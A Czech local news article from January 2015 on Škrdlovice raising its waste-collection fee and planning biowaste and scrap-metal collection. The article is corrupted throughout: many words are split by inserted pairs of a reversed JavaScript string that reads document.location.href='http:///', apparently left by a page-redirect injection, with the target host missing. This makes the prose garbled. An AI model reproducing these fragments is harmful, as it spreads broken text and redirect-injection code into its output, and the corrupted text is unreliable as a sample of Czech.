šrot
Rainbow page separator

Železný šrot budou i nadále svážet hasiči

Úterý, 27. ledna 2015

Škrdlovice / Z pěti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokorun na šest za jednoho obyvatele obce se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos ve Škrdlovicích zvýšil poplatek za provoz systému shromažďování, sběru, přepravy, třídění, využívání a odstraňování komunálních odpadů. Tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to změnu tam upravili prostřednictvím místní vyhlášky.
Tamní zastupitelé k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kroku přikročili ze dvou důvodů. Prvním byla skutečnost, že z rozpočtu obce bylo na každého poplatníka dopláceno více jak 43 korun, druhým důvodem bylo zavedení nové povinnosti pro města a obce ČR, která spočívá v zabezpečení odděleného sběru biologicky rozložitelného komunálního odpadu a sběru kovových odpadů.
„Prozatím je plánováno zřízení hnízd na biologicky rozložitelný komunální odpad, což z hlediska ceny odvozu odpadů vychází nejlevněji. Zavedení systému popelnic na biologicky rozložitelný komunální odpad k jednotlivým nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostem by poplatek za odpad zvýšilo o 250 korun, navíc ne každý by tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to službu využíval. Kovový odpad budou ze Škrdlovic svážet, jak [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu bylo v minulosti zvykem, dobrovolní hasiči, popřípadě bude pořízen jeden 1100 litrový kontejner na ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to odpad,“ informoval škrdlovický starosta Ivan Hořínek.